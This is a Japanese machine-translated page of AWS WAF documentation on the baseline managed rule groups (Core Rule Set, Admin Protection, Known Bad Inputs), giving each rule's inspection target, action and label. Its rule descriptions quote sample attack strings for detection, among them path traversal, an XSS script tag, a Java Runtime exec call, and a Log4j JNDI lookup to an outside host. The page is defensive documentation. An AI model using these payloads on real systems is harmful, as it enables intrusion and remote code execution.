ベースラインルールグループ - AWS WAF, AWS Firewall Managerおよび AWS Shield Advanced

翻訳は機械翻訳により提供されています。提供された翻訳内容と英語版の間で齟齬、不一致または矛盾がある場合、英語版が優先します。

ベースラインルールグループ

ベースラインマネージドルールグループは、さまざまな一般的な脅威に対する一般的な保護を提供します。これらのルールグループを 1 つ以上選択して、リソースのベースライン保護を確立します。

注記

AWS マネージドルールルールグループ内のルールについて公開する情報は、ルールを使用するのに十分な情報を提供することを目的としており、悪意のある人物がルールを回避するために悪用する可能性のある情報を提供するものではありません。このドキュメントに記載されている以上の情報が必要な場合は、AWS Support センター にお問い合わせください。

コアルールセット (CRS) マネージドルールグループ

VendorName: AWS、名前:AWSManagedRulesCommonRuleSet、WCU: 700

コアルールセット (CRS) ルールグループには、ウェブアプリケーションに一般的に適用可能なルールが含まれています。これにより、OWASP Top 10 などの OWASP の出版物に記載されている、リスクが高く一般的に発生するいくつかの脆弱性を含む、さまざまな脆弱性の悪用に対する保護が提供されます。 AWS WAF どのようなユースケースにもこのルールグループを使用することを検討してください。

このマネージドルールグループは、評価対象のウェブリクエストにラベルを追加します。このラベルは、ウェブ ACL 内のこのルールグループの後に実行されるルールでも使用できます。 AWS WAF また、ラベルを Amazon CloudWatch メトリックスに記録します。ラベルとラベルメトリクスに関する一般的な情報については、「ウェブリクエストでのラベルの使用」および「ラベルメトリクスとディメンション」を参照してください。

注記

この表には、このルールグループの最新の静的バージョンが示されています。他のバージョンでは API コマンドを使用してくださいDescribeManagedRuleGroup

ルール名 説明とラベル
NoUserAgent_HEADER

HTTP User-Agent ヘッダーが欠落しているリクエストを検査します。

ルールアクション: Block

ラベル: awswaf:managed:aws:core-rule-set:NoUserAgent_Header

UserAgent_BadBots_HEADER

リクエストが不正なボットであることを示す一般的な User-Agent ヘッダー値を検査します。パターンの例には、nessusnmap などがあります。ボット管理については、「AWS WAF Bot Control ルールグループ」も参照してください。

ルールアクション: Block

ラベル: awswaf:managed:aws:core-rule-set:BadBots_Header

SizeRestrictions_QUERYSTRING

2,048 バイトを超える URI クエリ文字列を検査します。

ルールアクション: Block

ラベル: awswaf:managed:aws:core-rule-set:SizeRestrictions_QueryString

SizeRestrictions_Cookie_HEADER

10,240 バイトを超える cookie ヘッダーを検査します。

ルールアクション: Block

ラベル: awswaf:managed:aws:core-rule-set:SizeRestrictions_Cookie_Header

SizeRestrictions_BODY

8 KB (8,192 バイト) を超えるリクエストボディを検査します。

ルールアクション: Block

ラベル: awswaf:managed:aws:core-rule-set:SizeRestrictions_Body

SizeRestrictions_URIPATH

1,024 バイトを超える URI パスを検査します。

ルールアクション: Block

ラベル: awswaf:managed:aws:core-rule-set:SizeRestrictions_URIPath

EC2MetaDataSSRF_BODY

リクエストボディから Amazon EC2 メタデータを盗み出す試みがないかを検査します。

警告

このルールは、ウェブ ACL とリソースタイプの本文サイズ制限までリクエスト本文を検査するだけです。Application Load Balancer およびの場合 AWS AppSync、制限は 8 KB に固定されています。API Gateway、Amazon Cognito、アプリケーションランナー、検証済みアクセスの場合、デフォルトの制限は 16 KB ですが、ウェブ ACL 設定で制限を最大 64 KB まで増やすことができます。 CloudFrontこのルールは、オーバーサイズコンテンツの処理に Continue オプションを使用します。詳細については、「でのオーバーサイズのウェブリクエストコンポーネントの処理 AWS WAF」を参照してください。

ルールアクション: Block

ラベル: awswaf:managed:aws:core-rule-set:EC2MetaDataSSRF_Body

EC2MetaDataSSRF_COOKIE

リクエスト cookie から Amazon EC2 メタデータを盗み出す試みがないかを検査します。

ルールアクション: Block

ラベル: awswaf:managed:aws:core-rule-set:EC2MetaDataSSRF_Cookie

EC2MetaDataSSRF_URIPATH

リクエスト URI パスから Amazon EC2 メタデータを盗み出す試みがないかを検査します。

ルールアクション: Block

ラベル: awswaf:managed:aws:core-rule-set:EC2MetaDataSSRF_URIPath

EC2MetaDataSSRF_QUERYARGUMENTS

リクエストクエリ引数から Amazon EC2 メタデータを盗み出す試みがないかを検査します。

ルールアクション: Block

ラベル: awswaf:managed:aws:core-rule-set:EC2MetaDataSSRF_QueryArguments

GenericLFI_QUERYARGUMENTS

クエリ引数に、ローカルファイルインクルージョン (LFI) を悪用する形跡がないかを検査します。例には、../../ などの手法を使用したパストラバーサルの試行があります。

ルールアクション: Block

ラベル: awswaf:managed:aws:core-rule-set:GenericLFI_QueryArguments

GenericLFI_URIPATH

URI パスに、ローカルファイルインクルージョン (LFI) を悪用する形跡がないかを検査します。例には、../../ などの手法を使用したパストラバーサルの試行があります。

ルールアクション: Block

ラベル: awswaf:managed:aws:core-rule-set:GenericLFI_URIPath

GenericLFI_BODY

リクエストボディに、ローカルファイルインクルージョン (LFI) を悪用する形跡がないかを検査します。例には、../../ などの手法を使用したパストラバーサルの試行があります。

警告

このルールは、ウェブ ACL とリソースタイプの本文サイズ制限までのリクエスト本文のみを検査します。Application Load Balancer およびの場合 AWS AppSync、制限は 8 KB に固定されています。API Gateway、Amazon Cognito、アプリケーションランナー、検証済みアクセスの場合、デフォルトの制限は 16 KB ですが、ウェブ ACL 設定で制限を最大 64 KB まで増やすことができます。 CloudFrontこのルールは、オーバーサイズコンテンツの処理に Continue オプションを使用します。詳細については、「でのオーバーサイズのウェブリクエストコンポーネントの処理 AWS WAF」を参照してください。

ルールアクション: Block

ラベル: awswaf:managed:aws:core-rule-set:GenericLFI_Body

RestrictedExtensions_URIPATH

読み取りや実行が安全でないシステムファイルの拡張子が URI パスに含まれているリクエストを検査します。パターンの例には、.log.ini などの拡張子があります。

ルールアクション: Block

ラベル: awswaf:managed:aws:core-rule-set:RestrictedExtensions_URIPath

RestrictedExtensions_QUERYARGUMENTS

クエリ引数に、読み取りや実行が安全でないシステムファイル拡張子が含まれているリクエストを検査します。パターンの例には、.log.ini などの拡張子があります。

ルールアクション: Block

ラベル: awswaf:managed:aws:core-rule-set:RestrictedExtensions_QueryArguments

GenericRFI_QUERYARGUMENTS

IPv4 アドレスを含む URL を埋め込むことにより、Web アプリケーションでRFI (リモートファイルインクルード) を悪用しようとする試みに対して、すべてのクエリパラメーターの値を検査します。例としては、http://https://ftp://ftps://file:// などのパターンがあり、悪用の試みに IPv4 ホストヘッダーが含まれています。

ルールアクション: Block

ラベル: awswaf:managed:aws:core-rule-set:GenericRFI_QueryArguments

GenericRFI_BODY

IPv4 アドレスを含む URL を埋め込むことにより、ウェブアプリケーションの RFI (リモートファイルインクルージョン) を悪用しようとする試行に対してリクエストボディを検査します。例としては、http://https://ftp://ftps://file:// などのパターンがあり、悪用の試みに IPv4 ホストヘッダーが含まれています。

警告

このルールは、ウェブ ACL とリソースタイプの本文サイズ制限までのリクエスト本文のみを検査します。Application Load Balancer およびの場合 AWS AppSync、制限は 8 KB に固定されています。API Gateway、Amazon Cognito、アプリケーションランナー、検証済みアクセスの場合、デフォルトの制限は 16 KB ですが、ウェブ ACL 設定で制限を最大 64 KB まで増やすことができます。 CloudFrontこのルールは、オーバーサイズコンテンツの処理に Continue オプションを使用します。詳細については、「でのオーバーサイズのウェブリクエストコンポーネントの処理 AWS WAF」を参照してください。

ルールアクション: Block

ラベル: awswaf:managed:aws:core-rule-set:GenericRFI_Body

GenericRFI_URIPATH

IPv4 アドレスを含む URL を埋め込むことにより、ウェブアプリケーションの RFI (リモートファイルインクルージョン) を悪用しようとする試行に対してURI パスを検査します。例としては、http://https://ftp://ftps://file:// などのパターンがあり、悪用の試みに IPv4 ホストヘッダーが含まれています。

ルールアクション: Block

ラベル: awswaf:managed:aws:core-rule-set:GenericRFI_URIPath

CrossSiteScripting_COOKIE

ビルトインを使用して、一般的なクロスサイトスクリプティング (XSS) パターンの Cookie ヘッダーの値を検査します。 AWS WAF クロスサイトスクリプティング攻撃ルールステートメントパターンの例には、<script>alert("hello")</script> などのスクリプトあります。

注記

このルールグループのバージョン 2.0 では、 AWS WAF ログ内のルールマッチの詳細は入力されません。

ルールアクション: Block

ラベル: awswaf:managed:aws:core-rule-set:CrossSiteScripting_Cookie

CrossSiteScripting_QUERYARGUMENTS

ビルトインを使用して、一般的なクロスサイトスクリプティング (XSS) パターンのクエリ引数の値を検査します。 AWS WAF クロスサイトスクリプティング攻撃ルールステートメントパターンの例には、<script>alert("hello")</script> などのスクリプトあります。

注記

このルールグループのバージョン 2.0 では、 AWS WAF ログ内のルールマッチの詳細は入力されません。

ルールアクション: Block

ラベル: awswaf:managed:aws:core-rule-set:CrossSiteScripting_QueryArguments

CrossSiteScripting_BODY

ビルトインを使用してリクエスト本文を検査し、一般的なクロスサイトスクリプティング (XSS) パターンがないか調べます。 AWS WAF クロスサイトスクリプティング攻撃ルールステートメントパターンの例には、<script>alert("hello")</script> などのスクリプトあります。

注記

このルールグループのバージョン 2.0 では、 AWS WAF ログ内のルールマッチの詳細は入力されません。

警告

このルールは、ウェブ ACL とリソースタイプの本文サイズ制限までリクエスト本文を検査するだけです。Application Load Balancer およびの場合 AWS AppSync、制限は 8 KB に固定されています。API Gateway、Amazon Cognito、アプリケーションランナー、検証済みアクセスの場合、デフォルトの制限は 16 KB ですが、ウェブ ACL 設定で制限を最大 64 KB まで増やすことができます。 CloudFrontこのルールは、オーバーサイズコンテンツの処理に Continue オプションを使用します。詳細については、「でのオーバーサイズのウェブリクエストコンポーネントの処理 AWS WAF」を参照してください。

ルールアクション: Block

ラベル: awswaf:managed:aws:core-rule-set:CrossSiteScripting_Body

CrossSiteScripting_URIPATH

組み込みを使用して URI パスの値を検査し、一般的なクロスサイトスクリプティング (XSS) パターンがないか調べます。 AWS WAF クロスサイトスクリプティング攻撃ルールステートメントパターンの例には、<script>alert("hello")</script> などのスクリプトあります。

注記

このルールグループのバージョン 2.0 では、 AWS WAF ログ内のルールマッチの詳細は入力されません。

ルールアクション: Block

ラベル: awswaf:managed:aws:core-rule-set:CrossSiteScripting_URIPath

管理者保護マネージドルールグループ

VendorName: AWS、名前:AWSManagedRulesAdminProtectionRuleSet、WCU: 100

管理者保護ルールグループには、公開されている管理ページへの外部アクセスをブロックするためのルールが含まれています。これは、サードパーティーのソフトウェアを実行している場合や、悪意のあるアクターがアプリケーションへの管理アクセスを得るリスクを緩和したい場合に便利です。

このマネージドルールグループは、評価対象のウェブリクエストにラベルを追加します。このラベルは、ウェブ ACL 内のこのルールグループの後に実行されるルールで使用できます。 AWS WAF また、ラベルを Amazon CloudWatch メトリックスに記録します。ラベルとラベルメトリクスに関する一般的な情報については、「ウェブリクエストでのラベルの使用」および「ラベルメトリクスとディメンション」を参照してください。

注記

この表には、このルールグループの最新の静的バージョンが示されています。他のバージョンでは API コマンドを使用してくださいDescribeManagedRuleGroup

ルール名 説明とラベル
AdminProtection_URIPATH

一般的にウェブサーバーまたはアプリケーションの管理用に確保されている URI パスの有無を検査します。パターンの例には、sqlmanager などがあります。

ルールアクション: Block

ラベル: awswaf:managed:aws:admin-protection:AdminProtection_URIPath

既知の不正な入力マネージドルールグループ

VendorName: AWS、名前:AWSManagedRulesKnownBadInputsRuleSet、WCU: 200

既知の不正な入力ルールグループには、無効であることがわかっており脆弱性の悪用または発見に関連するリクエストパターンをブロックするルールが含まれています。これにより、悪意のあるアクターが脆弱なアプリケーションを発見するリスクを緩和できます。

このマネージドルールグループは、評価対象のウェブリクエストにラベルを追加します。このラベルは、ウェブ ACL 内のこのルールグループの後に実行されるルールで使用できます。 AWS WAF また、ラベルを Amazon CloudWatch メトリックスに記録します。ラベルとラベルメトリクスに関する一般的な情報については、「ウェブリクエストでのラベルの使用」および「ラベルメトリクスとディメンション」を参照してください。

注記

この表には、このルールグループの最新の静的バージョンが示されています。他のバージョンでは API コマンドを使用してくださいDescribeManagedRuleGroup

ルール名 説明とラベル
JavaDeserializationRCE_HEADER

HTTP リクエストヘッダーのキーと値に、Spring Core および Cloud Function RCE の脆弱性 (CVE-2022-22963、CVE-2022-22965) などの Java デシリアライゼーション Remote Command Execution (RCE) の試行を示すパターンがないかどうかを検査します。パターンの例には、(java.lang.Runtime).getRuntime().exec("whoami") などがあります。

警告

このルールは、リクエストヘッダーの最初の 8 KB または最初の 200 個のヘッダーのうち、いずれかの制限に先に達した方のみを検査し、オーバーサイズコンテンツの処理に Continue オプションを使用します。詳細については、「でのオーバーサイズのウェブリクエストコンポーネントの処理 AWS WAF」を参照してください。

ルールアクション: Block

ラベル: awswaf:managed:aws:known-bad-inputs:JavaDeserializationRCE_Header

JavaDeserializationRCE_BODY

リクエスト本文で、Spring Core および Cloud Function RCE の脆弱性 (CVE-2022-22963、CVE-2022-22965) などの Java デシリアライゼーション Remote Command Execution (RCE) の試行を示すパターンがないかどうかを検査します。パターンの例には、(java.lang.Runtime).getRuntime().exec("whoami") などがあります。

警告

このルールは、ウェブ ACL とリソースタイプの本文サイズ制限までリクエスト本文を検査するだけです。Application Load Balancer およびの場合 AWS AppSync、制限は 8 KB に固定されています。API Gateway、Amazon Cognito、アプリケーションランナー、検証済みアクセスの場合、デフォルトの制限は 16 KB ですが、ウェブ ACL 設定で制限を最大 64 KB まで増やすことができます。 CloudFrontこのルールは、オーバーサイズコンテンツの処理に Continue オプションを使用します。詳細については、「でのオーバーサイズのウェブリクエストコンポーネントの処理 AWS WAF」を参照してください。

ルールアクション: Block

ラベル: awswaf:managed:aws:known-bad-inputs:JavaDeserializationRCE_Body

JavaDeserializationRCE_URIPATH

リクエスト URI で、Spring Core および Cloud Function RCE の脆弱性 (CVE-2022-22963、CVE-2022-22965) などの Java デシリアライゼーション Remote Command Execution (RCE) の試行を示すパターンがないかどうかを検査します。パターンの例には、(java.lang.Runtime).getRuntime().exec("whoami") などがあります。

ルールアクション: Block

ラベル: awswaf:managed:aws:known-bad-inputs:JavaDeserializationRCE_URIPath

JavaDeserializationRCE_QUERYSTRING

リクエストクエリ文字列で、Spring Core および Cloud Function RCE の脆弱性 (CVE-2022-22963、CVE-2022-22965) などの Java デシリアライゼーション Remote Command Execution (RCE) の試行を示すパターンがないかどうかを検査します。パターンの例には、(java.lang.Runtime).getRuntime().exec("whoami") などがあります。

ルールアクション: Block

ラベル: awswaf:managed:aws:known-bad-inputs:JavaDeserializationRCE_QueryString

Host_localhost_HEADER

リクエストのホストヘッダーに、localhost を示すパターンがないかを検査します。パターンの例には、localhost などがあります。

ルールアクション: Block

ラベル: awswaf:managed:aws:known-bad-inputs:Host_Localhost_Header

PROPFIND_METHOD

リクエストの HTTP メソッドに、PROPFIND がないかを検査します。このメソッドは HEAD と同様ですが、XML オブジェクトを抽出しようとする点が異なります。

ルールアクション: Block

ラベル: awswaf:managed:aws:known-bad-inputs:Propfind_Method

ExploitablePaths_URIPATH

URI パスに、悪用可能なウェブアプリケーションパスにアクセスする試みがないかを検査します。パターンの例には、web-inf などのパスがあります。

ルールアクション: Block

ラベル: awswaf:managed:aws:known-bad-inputs:ExploitablePaths_URIPath

Log4JRCE_HEADER

リクエストヘッダーのキーと値に Log4j の脆弱性 (CVE-2021-44228CVE-2021-45046CVE-2021-45105) の存在の有無を検査し、Remote Code Execution (RCE) の試行から保護します。パターンの例には、${jndi:ldap://example.com/} などがあります。

警告

このルールは、リクエストヘッダーの最初の 8 KB または最初の 200 個のヘッダーのうち、いずれかの制限に先に達した方のみを検査し、オーバーサイズコンテンツの処理に Continue オプションを使用します。詳細については、「でのオーバーサイズのウェブリクエストコンポーネントの処理 AWS WAF」を参照してください。

ルールアクション: Block

ラベル: awswaf:managed:aws:known-bad-inputs:Log4JRCE_Header

Log4JRCE_QUERYSTRING

クエリ文字列に Log4j の脆弱性 (CVE-2021-44228CVE-2021-45046CVE-2021-45105) の存在の有無を検査し、Remote Code Execution (RCE) の試行から保護します。パターンの例には、${jndi:ldap://example.com/} などがあります。

ルールアクション: Block

ラベル: awswaf:managed:aws:known-bad-inputs:Log4JRCE_QueryString

Log4JRCE_BODY

本文に Log4j の脆弱性 (CVE-2021-44228CVE-2021-45046CVE-2021-45105) の存在の有無を検査し、Remote Code Execution (RCE) の試行から保護します。パターンの例には、${jndi:ldap://example.com/} などがあります。

警告

このルールは、ウェブ ACL とリソースタイプの本文サイズ制限までのリクエスト本文のみを検査します。Application Load Balancer およびの場合 AWS AppSync、制限は 8 KB に固定されています。API Gateway、Amazon Cognito、アプリケーションランナー、検証済みアクセスの場合、デフォルトの制限は 16 KB ですが、ウェブ ACL 設定で制限を最大 64 KB まで増やすことができます。 CloudFrontこのルールは、オーバーサイズコンテンツの処理に Continue オプションを使用します。詳細については、「でのオーバーサイズのウェブリクエストコンポーネントの処理 AWS WAF」を参照してください。

ルールアクション: Block

ラベル: awswaf:managed:aws:known-bad-inputs:Log4JRCE_Body

Log4JRCE_URIPATH

URI パスに Log4j の脆弱性 (CVE-2021-44228CVE-2021-45046CVE-2021-45105) の存在の有無を検査し、Remote Code Execution (RCE) の試行から保護します。パターンの例には、${jndi:ldap://example.com/} などがあります。

ルールアクション: Block

ラベル: awswaf:managed:aws:known-bad-inputs:Log4JRCE_URIPath